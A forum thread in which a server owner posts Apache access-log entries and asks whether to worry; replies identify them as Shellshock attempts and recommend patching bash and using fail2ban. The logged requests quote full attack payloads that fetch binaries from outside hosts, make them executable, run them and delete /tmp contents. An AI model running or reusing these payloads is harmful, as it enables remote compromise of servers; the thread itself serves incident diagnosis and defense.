2

so after setting up a new server with just ssh (public key only) and a webserver which just serves one index.html I left for the weekend. Logging in on Monday I see this type of thing in my httpd access_logs

5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-sys/entropysearch.cgi HTTP/1.0" 404 223 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 224 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"
5.199.170.44 - - [07/Apr/2015:12:07:48 +0200] "GET /cgi-mod/index.cgi HTTP/1.0" 404 215 "() { :;} ;echo;/usr/local/bin/php -r '$a = \"http://x5d.su/x/Help1\";''$b = \"http://x5d.su/x/Help2\";''$c = sys_get_temp_dir();''$d = \"Help1\";''$e = \"Help2\";''$f = \"chmod 777\";''$g = \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = \"fopen\";''if ($i($c . \"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", \"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c .\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . \"/$e\");''}'" "-"

and

61.160.232.203 - - [07/Apr/2015:02:39:36 +0200] "GET / HTTP/1.1" 200 66 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo /tmp/China.Z-gvzo\xa0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""
61.160.232.203 - - [07/Apr/2015:02:39:36 +0200] "GET / HTTP/1.1" 200 66 "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\"" "() { :; }; /bin/bash -c \"rm -rf /tmp/*;echo wget http://61.160.232.203:9992/zxzdl -O /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo echo By China.Z >> /tmp/Run.sh;echo chmod 777 /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo /tmp/China.Z-oajg0 >> /tmp/Run.sh;echo rm -rf /tmp/Run.sh >> /tmp/Run.sh;chmod 777 /tmp/Run.sh;/tmp/Run.sh\""

and lots more of the sort. Especially this China.Z guy was very insistent. I basically understand what this is, that they are probing my machine and trying to get info about it (right?) but

  • during the weekend, when there should have been no traffic on the machine (as I said, there is nothing running on it) there were about 200mb of outbound traffic
  • httpd was restarted during this time, as far as I can tell that shouldn't have happened
  • some of these requests returned 200 (the "/" ones for instance), should I be worried?

These two examples are indeed larger tries, with many requests from the same IP, but there are many others with just one request / IP.

So, should I worry about this? I've shut down my apache and also closed the relevant ports in the firewall, but I will need apache running on this machine. Also, is there something I can / should do to prevent this?

Also: this machine is internet-facing and has a fixed IP, I'm guessing that's why I'm getting pounded.

Thanks :)

peph
  • 23
  • 3
  • Seems one can't send private messages here, which is unfortunate. 5.199.170.44 was my server, which was compromised this morning via a Shellshock entrypoint (around a similar time to when it hit you above), and which is now undergoing cleaning. Just wanted to offer my apologies. – Andrew Apr 07 '15 at 19:48
  • Wow the world is small ^^ no worries though, as posted above as far as I can tell all is well and my system should be safe. Good luck cleaning yours :) – peph Apr 07 '15 at 20:15

1 Answers1

6

You are being hit with Shellshock attempts. As long as you have patched your bash, you should be safe against these attempts. However, you might want to invest in a system for banning repeat system abusers. Try fail2ban.

What is a specific example of how the Shellshock Bash bug could be exploited?

If you haven't patched bash, you are in big, big trouble.

MrSynAckSter
  • 2,040
  • 10
  • 16
  • Agree on all counts. – armani Apr 07 '15 at 16:48
  • 1
    Thanks for the info :) I ran the shellshock-test from https://shellshocker.net/ , all seems fine, as in - my system seems to not be vulnerable against shellshock. After seeing those logs today I already got fail2ban up and running, thanks for the suggestion. – peph Apr 07 '15 at 20:14